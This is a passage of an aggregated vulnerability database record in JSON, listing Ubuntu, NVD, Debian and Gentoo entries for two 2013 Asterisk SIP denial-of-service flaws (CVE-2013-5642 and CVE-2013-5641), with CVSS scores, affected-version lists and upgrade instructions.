"id": "CPAI-2013-3492", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "ubuntucve": [{"lastseen": "2022-08-04T14:24:12", "description": "The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1.8.x\nbefore 1.8.23.1, 10.x before 10.12.3, and 11.x before 11.5.1; Certified\nAsterisk 1.8.15 before 1.8.15-cert3 and 11.2 before 11.2-cert2; and\nAsterisk Digiumphones 10.x-digiumphones before 10.12.3-digiumphones allows\nremote attackers to cause a denial of service (NULL pointer dereference,\nsegmentation fault, and daemon crash) via an invalid SDP that defines a\nmedia description before the connection description in a SIP request.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=721220>\n", "cvss3": {}, "published": "2013-09-09T00:00:00", "type": "ubuntucve", "title": 
"CVE-2013-5642", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5642"], "modified": "2013-09-09T00:00:00", "id": "UB:CVE-2013-5642", "href": "https://ubuntu.com/security/CVE-2013-5642", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:24:12", "description": "The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source\n1.8.17.x through 1.8.22.x, 1.8.23.x before 1.8.23.1, and 11.x before 11.5.1\nand Certified Asterisk 1.8.15 before 1.8.15-cert3 and 11.2 before\n11.2-cert2 allows remote attackers to cause a denial of service (NULL\npointer dereference, segmentation fault, and daemon crash) via an ACK with\nSDP to a previously terminated channel. 
NOTE: some of these details are\nobtained from third party information.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=721220>\n", "cvss3": {}, "published": "2013-09-09T00:00:00", "type": "ubuntucve", "title": "CVE-2013-5641", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641"], "modified": "2013-09-09T00:00:00", "id": "UB:CVE-2013-5641", "href": "https://ubuntu.com/security/CVE-2013-5641", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "cve": [{"lastseen": "2023-02-09T14:40:26", "description": "The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1.8.x before 1.8.23.1, 10.x before 10.12.3, and 11.x before 11.5.1; Certified Asterisk 1.8.15 before 1.8.15-cert3 and 11.2 before 11.2-cert2; and Asterisk Digiumphones 10.x-digiumphones before 10.12.3-digiumphones allows remote attackers to cause a denial of service (NULL pointer dereference, segmentation fault, and daemon crash) via an invalid SDP that defines a media description before the connection description in a SIP request.", "cvss3": {}, "published": "2013-09-09T17:55:00", "type": "cve", "title": "CVE-2013-5642", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": 
"AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5642"], "modified": "2013-09-12T03:37:00", "cpe": ["cpe:/a:digium:asterisk:11.5.1", "cpe:/a:digium:asterisk:11.2.0", "cpe:/a:digium:asterisk_digiumphones:10.11.0", "cpe:/a:digium:asterisk_digiumphones:10.12.1", "cpe:/a:digium:asterisk:1.8.23.0", "cpe:/a:digium:asterisk:10.12.1", "cpe:/a:digium:asterisk:1.8.22.0", "cpe:/a:digium:asterisk:11.4.0", "cpe:/a:digium:asterisk:1.8.18.0", "cpe:/a:digium:asterisk:10.12.2", "cpe:/a:digium:asterisk:10.10.0", "cpe:/a:digium:asterisk_digiumphones:10.12.2", "cpe:/a:digium:asterisk:11.1.0", "cpe:/a:digium:asterisk_digiumphones:10.0.0", "cpe:/a:digium:asterisk:10.12.0", "cpe:/a:digium:certified_asterisk:11.2.0", "cpe:/a:digium:asterisk:11.5.0", "cpe:/a:digium:asterisk:1.8.19.1", "cpe:/a:digium:asterisk:11.0.1", "cpe:/a:digium:asterisk:11.0.0", "cpe:/a:digium:asterisk:11.0.2", "cpe:/a:digium:asterisk:1.8.17.0", "cpe:/a:digium:asterisk_digiumphones:10.12.0", "cpe:/a:digium:asterisk:11.3.0", "cpe:/a:digium:asterisk:1.8.20.0", "cpe:/a:digium:asterisk:11.1.2", "cpe:/a:digium:asterisk:1.8.21.0", "cpe:/a:digium:asterisk:11.1.1", "cpe:/a:digium:asterisk:1.8.19.0", "cpe:/a:digium:asterisk:10.11.0", "cpe:/a:digium:certified_asterisk:1.8.15", "cpe:/a:digium:asterisk:1.8.18.1"], "id": "CVE-2013-5642", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5642", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:digium:asterisk:1.8.17.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.20.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.23.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.0.0:rc1:*:*:*:*:*:*", 
"cpe:2.3:a:digium:asterisk_digiumphones:10.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.21.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:cert1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.12.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.20.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.3.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.21.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.22.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:rc3:*:*:*:*:*:*", 
"cpe:2.3:a:digium:asterisk:10.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.20.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.23.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.12.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.3.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.23.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.11.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.22.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.11.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc2:*:*:*:*:*:*", 
"cpe:2.3:a:digium:asterisk:1.8.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.11.0:rc3:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:40:28", "description": "The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1.8.17.x through 1.8.22.x, 1.8.23.x before 1.8.23.1, and 11.x before 11.5.1 and Certified Asterisk 1.8.15 before 1.8.15-cert3 and 11.2 before 11.2-cert2 allows remote attackers to cause a denial of service (NULL pointer dereference, segmentation fault, and daemon crash) via an ACK with SDP to a previously terminated channel. NOTE: some of these details are obtained from third party information.", "cvss3": {}, "published": "2013-09-09T17:55:00", "type": "cve", "title": "CVE-2013-5641", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641"], "modified": "2013-09-12T03:37:00", "cpe": ["cpe:/a:digium:asterisk:11.5.1", "cpe:/a:digium:asterisk:11.2.0", "cpe:/a:digium:asterisk:1.8.23.0", "cpe:/a:digium:asterisk:1.8.22.0", "cpe:/a:digium:asterisk:11.4.0", "cpe:/a:digium:asterisk:1.8.18.0", "cpe:/a:digium:asterisk:11.1.0", "cpe:/a:digium:certified_asterisk:11.2.0", "cpe:/a:digium:asterisk:11.5.0", "cpe:/a:digium:asterisk:1.8.19.1", "cpe:/a:digium:asterisk:11.0.1", "cpe:/a:digium:asterisk:11.0.0", "cpe:/a:digium:asterisk:11.0.2", "cpe:/a:digium:asterisk:1.8.17.0", "cpe:/a:digium:asterisk:11.3.0", "cpe:/a:digium:asterisk:1.8.20.0", "cpe:/a:digium:asterisk:11.1.2", "cpe:/a:digium:asterisk:1.8.21.0", 
"cpe:/a:digium:asterisk:11.1.1", "cpe:/a:digium:asterisk:1.8.19.0", "cpe:/a:digium:certified_asterisk:1.8.15", "cpe:/a:digium:asterisk:1.8.18.1"], "id": "CVE-2013-5641", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5641", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:digium:asterisk:1.8.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.20.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.23.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.22.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.23.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.20.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.22.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.21.0:rc1:*:*:*:*:*:*", 
"cpe:2.3:a:digium:certified_asterisk:1.8.15:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.23.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.20.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.3.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:cert1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.21.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.3.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.1:*:*:*:*:*:*:*"]}], "debiancve": [{"lastseen": "2023-03-27T19:28:12", "description": "The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1.8.x before 1.8.23.1, 10.x before 10.12.3, and 11.x before 11.5.1; Certified Asterisk 1.8.15 before 1.8.15-cert3 and 11.2 before 11.2-cert2; and Asterisk Digiumphones 10.x-digiumphones before 10.12.3-digiumphones allows remote attackers to cause a denial of service (NULL pointer dereference, segmentation fault, and daemon crash) via an invalid SDP that defines a media description 
before the connection description in a SIP request.", "cvss3": {}, "published": "2013-09-09T17:55:00", "type": "debiancve", "title": "CVE-2013-5642", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5642"], "modified": "2013-09-09T17:55:00", "id": "DEBIANCVE:CVE-2013-5642", "href": "https://security-tracker.debian.org/tracker/CVE-2013-5642", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-03-27T19:28:12", "description": "The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1.8.17.x through 1.8.22.x, 1.8.23.x before 1.8.23.1, and 11.x before 11.5.1 and Certified Asterisk 1.8.15 before 1.8.15-cert3 and 11.2 before 11.2-cert2 allows remote attackers to cause a denial of service (NULL pointer dereference, segmentation fault, and daemon crash) via an ACK with SDP to a previously terminated channel. 
NOTE: some of these details are obtained from third party information.", "cvss3": {}, "published": "2013-09-09T17:55:00", "type": "debiancve", "title": "CVE-2013-5641", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641"], "modified": "2013-09-09T17:55:00", "id": "DEBIANCVE:CVE-2013-5641", "href": "https://security-tracker.debian.org/tracker/CVE-2013-5641", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "gentoo": [{"lastseen": "2022-01-17T19:09:28", "description": "### Background\n\nAsterisk is an open source telephony engine and toolkit.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Asterisk. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could execute arbitrary code with the privileges of the process, cause a Denial of Service condition, or obtain sensitive information. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Asterisk 11.* users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/asterisk-11.7.0\"\n \n\nAll Asterisk 1.8.* users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/asterisk-1.8.25.0\"", "cvss3": {}, "published": "2014-01-21T00:00:00", "type": "gentoo", "title": "Asterisk: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977", "CVE-2013-2264", "CVE-2013-2685", "CVE-2013-2686", "CVE-2013-5641", "CVE-2013-5642", "CVE-2013-7100"], "modified": "2014-01-21T00:00:00", "id": "GLSA-201401-15", "href": "https://security.gentoo.org/glsa/201401-15", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}